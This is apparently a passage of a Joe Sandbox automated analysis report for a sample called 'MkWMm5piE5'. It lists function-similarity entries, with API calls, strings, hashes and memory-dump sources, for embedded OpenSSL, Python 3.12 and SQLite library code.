                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_ec_pt_formats
                                                                                                                                                                                                                                                                          • API String ID: 193678381-302162076
                                                                                                                                                                                                                                                                          • Opcode ID: 32a6f9776cb032b03c8032495df5a918a5cad4a555ab84a19d7419df9e64607c
                                                                                                                                                                                                                                                                          • Instruction ID: cd3f50edeb18efe509eda5f0b6df88febecb94de632f056fd4f7bebf76f5b38b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32a6f9776cb032b03c8032495df5a918a5cad4a555ab84a19d7419df9e64607c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B23175A1B4864242EB519B1AED016BD6750EFC5BC4F4C4033ED4DABFAADE6DE5438700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3617616757-0
                                                                                                                                                                                                                                                                          • Opcode ID: 527074c6cd195ab482c56603e858959c90a590d2c84401fac90cb2060dcc2367
                                                                                                                                                                                                                                                                          • Instruction ID: f046fba05ae61e0b90a85a4cd414bbca29531685e3d5b184544311bfec9f52f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 527074c6cd195ab482c56603e858959c90a590d2c84401fac90cb2060dcc2367
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B941A436909A4281EB754F38985837C26A0AF55B3DF284736CA69419F4EFFFA885C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c$dtls_construct_hello_verify_request
                                                                                                                                                                                                                                                                          • API String ID: 193678381-1802759638
                                                                                                                                                                                                                                                                          • Opcode ID: 7dcbd0304b8e375ba76571aadec54ba898face8740b3578bc16fcd331b84ba92
                                                                                                                                                                                                                                                                          • Instruction ID: 6390e1c291452055c2a1782ec6fff5d976cd3d667b60c17ed68ecf9aff23ead7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dcbd0304b8e375ba76571aadec54ba898face8740b3578bc16fcd331b84ba92
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56318FA1B5868285E7509B19ED41BFD2660EF89BC4F4C1037EE4DA7FA7DE2DE4428700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c$tls_construct_server_certificate
                                                                                                                                                                                                                                                                          • API String ID: 193678381-3740638300
                                                                                                                                                                                                                                                                          • Opcode ID: 5e8f9fd54255d8eaf0200b4dcaf057a1a06d5fbff35f8e3f935c55a8c660f0f3
                                                                                                                                                                                                                                                                          • Instruction ID: 95d043cfab7e952ac18bf01359bb1f036f4356bc3295614bd8ffd65418066751
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8f9fd54255d8eaf0200b4dcaf057a1a06d5fbff35f8e3f935c55a8c660f0f3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521A461B5869185EB40D71AEC806BD6750EF84BC4F4C5036EE4DA3FA6DE2DE5838700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: O_indentO_printf
                                                                                                                                                                                                                                                                          • String ID: %s=0x%x (%s)$UNKNOWN$cookie$server_version
                                                                                                                                                                                                                                                                          • API String ID: 1860387303-3219550004
                                                                                                                                                                                                                                                                          • Opcode ID: 4dd16a70943f216feb86396802f6890110aa8001412dae270de28ff3e01f75e9
                                                                                                                                                                                                                                                                          • Instruction ID: 22f459c0787da929659d7147de47bcb44975b87ac4df3618fde9f836c0cea7f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dd16a70943f216feb86396802f6890110aa8001412dae270de28ff3e01f75e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4721A161AA8A8186E7108B5AE8450BDB7A4FB447C0F585433EE8D63F75DF3DE5139700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: O_clear_flagsO_set_flagsR_newR_set_debug
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c$ossl_statem_server_read_transition
                                                                                                                                                                                                                                                                          • API String ID: 4119164335-396436010
                                                                                                                                                                                                                                                                          • Opcode ID: 421364760767246ed4bc9184b5bb19bd824f5f8cffda2e2b20676fc304dc1b2d
                                                                                                                                                                                                                                                                          • Instruction ID: 666e3426849d2cf508706317f3e0bfbb0178d3545dcfc619ae38cef7889aba73
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 421364760767246ed4bc9184b5bb19bd824f5f8cffda2e2b20676fc304dc1b2d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56119DA1F861024EFB959B6ADC813BC2291DB90784F4C6036CD0C9BAE5CF7DA9D78740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2819143443-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1c16e7615a0f82207d80faaa12bf775c49de3bd6999ef687b31fc543c5e7b3c6
                                                                                                                                                                                                                                                                          • Instruction ID: cc4436e49c566c2566e54e77ade0a9e4261f9606edd7f0ae5bc78bf5b70ffb5f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c16e7615a0f82207d80faaa12bf775c49de3bd6999ef687b31fc543c5e7b3c6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B221003190968281EBB58F25955833C22A0EF54FBDF1D4232D92D46AF5EFBED445C740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _PyArg_CheckPositional.PYTHON312 ref: 00007FFEDCD13607
                                                                                                                                                                                                                                                                          • _PyArg_BadArgument.PYTHON312 ref: 00007FFEDCD1363A
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FFEDCD111B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFEDCD111E2
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FFEDCD111B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFEDCD111FA
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FFEDCD111B0: PyType_IsSubtype.PYTHON312 ref: 00007FFEDCD1121D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                                                                          • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                                                                          • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                                                                          • Opcode ID: 2dbf24b9019d36270aeee854f5eb720b9aec5d3fd397e623ab08701816bde558
                                                                                                                                                                                                                                                                          • Instruction ID: fb2ea1a4f1d4bee139bb5a49f4db74f64ff76c7a7f673022df56be5ae0fd0a2a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dbf24b9019d36270aeee854f5eb720b9aec5d3fd397e623ab08701816bde558
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A115EA1B48A8290EA508B59EC816BD6360AB04FD4F5C8033D90D07BF4DE2CD58BC740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                                          • String ID: argument 1$argument 2$is_normalized$str
                                                                                                                                                                                                                                                                          • API String ID: 3876575403-184702317
                                                                                                                                                                                                                                                                          • Opcode ID: ed7039aedf8594f44b2dcd06c7a3654b924861e91dfb93c4f465d606fbcafc7c
                                                                                                                                                                                                                                                                          • Instruction ID: 0f8e3ed9d4f1865c3ce3f41563e0fa64d5b9daea2976e413b85020570307b9f6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed7039aedf8594f44b2dcd06c7a3654b924861e91dfb93c4f465d606fbcafc7c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9015EA5B58A8694EB509B49EC816BD6360AF05FD4F4C8033D90D07AF8DE2CD59BC780
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 00007FFEDCC04E35
                                                                                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00007FFEDCC0514C
                                                                                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFEDCC04E5E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596106431.00007FFEDCBA1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFEDCBA0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596079579.00007FFEDCBA0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596266920.00007FFEDCCFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596342688.00007FFEDCCFF000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcba0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                                          • API String ID: 438689982-272990098
                                                                                                                                                                                                                                                                          • Opcode ID: 26a60f2d29f2a27fc32945a5499dcfcea72275a31f881582fff33eec9206aef0
                                                                                                                                                                                                                                                                          • Instruction ID: b3a66aba440ce3741b5093fbe8644375f2e05d3159d26c5caa4649e018014fd2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26a60f2d29f2a27fc32945a5499dcfcea72275a31f881582fff33eec9206aef0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17D1F062A49B8182EB60CB1990447BE7BA1FB45BC4F484532DF9E43BA6DF3CE442D705
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • PyLong_FromSsize_t.PYTHON312 ref: 00007FFEDD952D16
                                                                                                                                                                                                                                                                          • PyLong_FromSsize_t.PYTHON312 ref: 00007FFEDD952D42
                                                                                                                                                                                                                                                                          • PyNumber_Remainder.PYTHON312 ref: 00007FFEDD952D5F
                                                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON312 ref: 00007FFEDD952D76
                                                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON312 ref: 00007FFEDD952D8A
                                                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON312 ref: 00007FFEDD952DE4
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FFEDD953590: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFEDD9528DB), ref: 00007FFEDD953599
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FFEDD953590: fprintf.MSPDB140-MSVCRT ref: 00007FFEDD9535A9
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FFEDD953590: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFEDD9528DB), ref: 00007FFEDD9535B3
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FFEDD953590: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFEDD9528DB), ref: 00007FFEDD9535BC
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FFEDD953590: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFEDD9528DB), ref: 00007FFEDD9535C2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$FromLong_Ssize_t__acrt_iob_func$Number_Remainderabortfflushfprintf
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1333916573-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1ff0950ba76d1fb5de8f3a40737609fc14ed6e45cecf514f6e3c309322584276
                                                                                                                                                                                                                                                                          • Instruction ID: 16675a509cf548b41fda931702bf7c291725ed05a61e304e8bb3876512b4261f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff0950ba76d1fb5de8f3a40737609fc14ed6e45cecf514f6e3c309322584276
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9941B632B0950281EA754B15E55063C6290AF48BE8F4C4232DE5D47FF5EF6EE4428700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2594249532.00007FFEDC461000.00000020.00000001.01000000.00000031.sdmp, Offset: 00007FFEDC460000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594232558.00007FFEDC460000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594266457.00007FFEDC463000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594284786.00007FFEDC464000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594301723.00007FFEDC465000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc460000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _aligned_free_aligned_malloc$callocfree
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2511558924-0
                                                                                                                                                                                                                                                                          • Opcode ID: ad5b6e24f9c8b9f834445484b1b680c9dc9662bd7dde14abf273014921dd1c5e
                                                                                                                                                                                                                                                                          • Instruction ID: 99dbe8daced04d751695327c61b367c7d6f78b711ac6f18f9a3f047713a442f8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad5b6e24f9c8b9f834445484b1b680c9dc9662bd7dde14abf273014921dd1c5e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29413D66A89B4186EA25CB49E4502BD73B1BB44BD4F484536CE8D47BA8EF7CE486C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$FromLong_Ssize_t$MultiplyNumber_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3214704217-0
                                                                                                                                                                                                                                                                          • Opcode ID: e441c8e1654ce7b2f422eefc1750921705619e20d6a3389d9b7057bf79d9000f
                                                                                                                                                                                                                                                                          • Instruction ID: b193abcfdca16bd802bfcf63efb714cf9a7116429d999fbb850b830d4cb3ce22
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e441c8e1654ce7b2f422eefc1750921705619e20d6a3389d9b7057bf79d9000f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5315A32A09A0286EE785F15E55477C6290AF59BA8F0C5132DA1E47FF5FFAEE4818300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
